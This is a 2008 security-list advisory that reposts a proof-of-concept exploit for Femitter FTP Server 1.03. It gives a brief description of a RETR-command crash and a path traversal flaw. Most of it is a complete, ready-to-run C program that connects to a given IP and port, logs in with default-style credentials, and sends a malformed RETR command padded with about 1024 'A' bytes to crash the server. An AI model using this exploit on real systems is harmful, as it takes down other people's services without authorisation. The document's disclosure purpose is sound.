[EXPL]Femitter FTP Server RETR Denial of Service
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 4 Oct 2008 18:20:28 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Femitter FTP Server RETR Denial of Service
------------------------------------------------------------------------
SUMMARY
<http://acritum.com/fem/index.htm> Femitter Server is "an easy-to use
HTTP and FTP server application for Windows which allows you to use your
own computer for sharing gigabytes of files with your friends and
colleagues". A vulnerability in Femitter allows remote attackers to cause
the server to crash by sending it a malformed RETR command.
DETAILS
Vulnerable Systems:
* Femitter FTP Server version 1.03
<B>Exploit:</B>
/*0-------------------------------------------0*\
0 0
| |
| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC |
| |
| Summary: Femitter Server is an easy-to use HTTP and FTP server
application |
| for Windows which allows you to use your own computer for sharing
gigabytes |
| of files with your friends and colleagues. |
| |
| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service
vulnerability |
| and memory corruption that causes the application to crash. When we send
to |
| the RETR command an argument like AAAA:AAAA or an overly long string of
As |
| (1024), the server crashes instantly. Also, when typing into browser: |
| ftp://127.0.0.1/\.. we traverse to the install folder of the
program(CWD), |
| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation
at |
| address 004A218A in module "fem.exe". Write of address 00000000. |
| |
| Producst web page: http://acritum.com/fem/index.htm |
| |
| Tested on Microsoft Windows XP SP2 (English) |
| |
| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic |
| |
| liquidworm [t00t] gmail.com |
| |
| http://www.zeroscience.org/ |
| |
| 17.09.2008 |
| |
0 0
\*0-------------------------------------------0*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#define MANA
"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA"
void header(void);
int main (int argc, char *argv[])
{
int sckt = 0, sfd = 0;
char user[] = "USER admin\r\n";
char pass[] = "PASS nimda\r\n";
unsigned char payload[]=
"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\xD\xA";
header();
if(argc != 3)
{
printf("\nUsage: %s [ip] [port]\n\n", argv[0]);
return (EXIT_SUCCESS);
}
struct sockaddr_in dos_ftp;
sfd = socket(AF_INET, SOCK_STREAM, 0);
if(sfd < 0)
{
perror("Socket");
printf("Error creating socket...\n");
return(1);
}
printf("\n\n[+] Socket created!\n");
sleep (1);
memset(&dos_ftp, 0x0, sizeof(dos_ftp));
dos_ftp.sin_family = AF_INET;
dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
dos_ftp.sin_port = htons(atoi(argv[2]));
sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));
if(sckt < 0)
{
perror("Connect");
printf("Error connecting...\n");
return(1);
}
printf("[+] Connection established!\n");
sleep (1);
write(sfd, user, strlen(user)); // username
printf("[+] Sending CMD: %s\n", user);
sleep (2);
write(sfd, pass, strlen(pass)); // password
printf("[+] Sending CMD: %s\n", pass);
sleep (2);
printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1],
argv[2]);
sleep(2);
send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA,
sizeof(MANA),0);
printf("[+] Malicious buffer succesfully sent...\n");
sleep (1);
printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]);
close (sfd);
return(0);
}
void header()
{
printf("\n********************************************************************************\n\n");
printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service
Exploit PoC\n");
printf("\t\t\tby LiquidWorm <liquidworm [t00t] gmail.com>\n\n");
printf("********************************************************************************\n\n");
}
// milw0rm.com [2008-09-17]
ADDITIONAL INFORMATION
The information has been provided by <mailto:liquidworm@xxxxxxxxx>
liquidworm.
The original article can be found at:
<http://www.milw0rm.com/exploits/6481>
http://www.milw0rm.com/exploits/6481
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [EXPL]WonderWare SiteLink Denial of Service (Exploit)
- Next by Date: [EXPL]QuickTime and iTunes Heap Overflow (Exploit)
- Previous by thread: [EXPL]WonderWare SiteLink Denial of Service (Exploit)
- Next by thread: [EXPL]QuickTime and iTunes Heap Overflow (Exploit)
- Index(es):
Relevant Pages
|
